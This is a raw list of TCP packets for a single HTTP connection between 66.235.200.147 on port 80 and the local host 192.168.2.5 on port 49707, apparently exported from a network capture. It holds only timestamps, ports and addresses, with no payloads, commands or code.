Nov 26, 2022 11:17:42.686798096 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.686800003 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.686816931 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.686836004 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.686855078 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.686861992 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.686882019 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.686888933 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.686903000 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.686922073 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.686939955 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.686948061 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.686959028 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.686969995 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.686976910 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.686995983 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.687005997 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.687015057 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.687036991 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.687513113 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.687530994 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.687561035 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.687577963 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.687585115 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.687596083 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.687623024 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.687643051 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.687665939 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.687685013 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.687702894 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.687721014 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.687745094 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.687764883 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.687772036 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.687783003 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.687800884 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.687819958 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.687834978 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.687838078 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.687886953 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.687894106 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.687911987 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.687930107 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.687947989 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.687956095 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.687966108 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.687968016 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.687982082 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.687999964 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.688018084 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.688036919 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.688046932 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.688046932 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.688055038 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.688077927 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.688344955 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.688364983 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.688385010 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.688402891 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.688417912 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.688421011 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.688453913 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.688471079 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.688519955 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.688539982 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.688559055 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.688579082 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.688586950 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.688596010 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.688616037 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.688633919 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.688633919 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.688652992 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.688661098 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.688671112 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.688689947 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.688708067 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.688715935 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.688724995 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.688741922 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.688743114 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.688761950 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.688762903 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.688780069 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.688798904 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.688802958 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.688817978 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.688836098 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.688849926 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.688854933 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.688874006 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.688891888 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.688895941 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.688934088 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.689301014 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.689464092 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.689481974 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.689501047 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.689519882 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.689526081 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.689538002 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.689548016 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.689555883 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.689565897 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.689574957 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.689605951 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.689625025 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.689644098 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.689662933 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.689673901 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.689680099 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.689698935 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.689718008 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.689723015 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.689734936 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.689752102 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.689753056 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.689771891 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.689789057 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.689791918 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.689810991 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.689829111 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.689835072 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.689847946 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.689861059 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.689866066 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.689883947 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.689888000 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.689903975 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.689927101 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.690567017 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.690586090 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.690603018 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.690619946 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.690620899 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.690639973 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.690649033 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.690658092 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.690676928 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.690681934 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.690711021 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.690728903 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.690746069 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.690754890 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.690766096 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.690783978 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.690785885 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.690802097 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.690812111 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.690821886 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.690840960 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.690859079 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.690860987 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.690887928 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.690887928 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.690907955 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.690927029 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.690943956 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.690959930 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.690963030 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.690980911 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.690989971 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.690999985 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.691003084 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.691018105 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.691035986 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.691332102 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.691509962 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.691528082 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.691548109 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.691560984 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.691565990 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.691585064 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.691593885 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.691601992 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.691620111 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.691631079 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.691638947 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.691646099 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.691658020 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.691675901 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.691683054 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.691694975 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.691713095 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.691731930 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.691744089 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.691749096 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.691766977 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.691766977 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.691783905 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.691795111 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.691802979 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.691823006 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.691832066 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.691840887 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.691859961 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.691879034 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.691884995 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.691895962 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.691907883 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.691915035 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.691941977 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.692287922 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.692478895 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.692497969 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.692517042 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.692531109 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.692534924 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.692553997 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.692560911 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.692572117 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.692584991 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.692589998 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.692610025 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.692619085 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.692630053 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.692647934 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.692666054 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.692672014 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.692683935 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.692698002 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.692702055 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.692719936 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.692723036 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.692738056 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.692756891 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.692770958 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.692775011 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.692795992 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.692816019 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.692821026 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.692833900 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.692843914 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.692852974 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.692871094 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.692878962 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.692888975 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.692913055 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.693264008 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.693280935 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.693299055 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.693317890 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.693334103 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.693336010 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.693353891 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.693367004 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.693383932 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.693454981 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.693474054 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.693491936 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.693510056 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.693521023 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.693527937 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.693542957 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.693547010 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.693566084 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.693574905 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.693583965 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.693613052 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.693619013 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.693636894 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.693655968 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.693659067 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.693672895 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.693691969 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.693710089 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.693715096 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.693746090 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.693769932 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.693788052 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.693806887 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.693810940 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.693826914 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.693845987 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.693865061 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.693869114 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.693898916 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.694288969 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.694308043 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.694327116 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.694344044 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.694361925 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.694390059 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.694484949 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.694504023 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.694530010 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.694586992 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.694607019 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.694624901 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.694643974 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.694654942 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.694662094 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.694683075 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.694685936 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.694701910 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.694706917 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.694720984 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.694741011 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.694750071 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.694760084 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.694778919 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.694785118 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.694797039 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.694816113 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.694833994 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.694848061 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.694849968 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.694864988 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.694880009 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.694894075 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.694901943 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.694912910 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.694957018 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.695352077 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.695369959 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.695389032 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.695399046 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.695406914 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.695421934 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.695477009 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.695549011 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.695574045 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.695593119 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.695611954 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.695617914 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.695630074 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.695647955 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.695667028 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.695668936 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.695686102 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.695694923 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.695704937 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.695724010 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.695744038 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.695748091 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.695763111 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.695765972 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.695780993 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.695800066 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.695806026 CET	49707	80	192.168.2.5	66.235.200.147
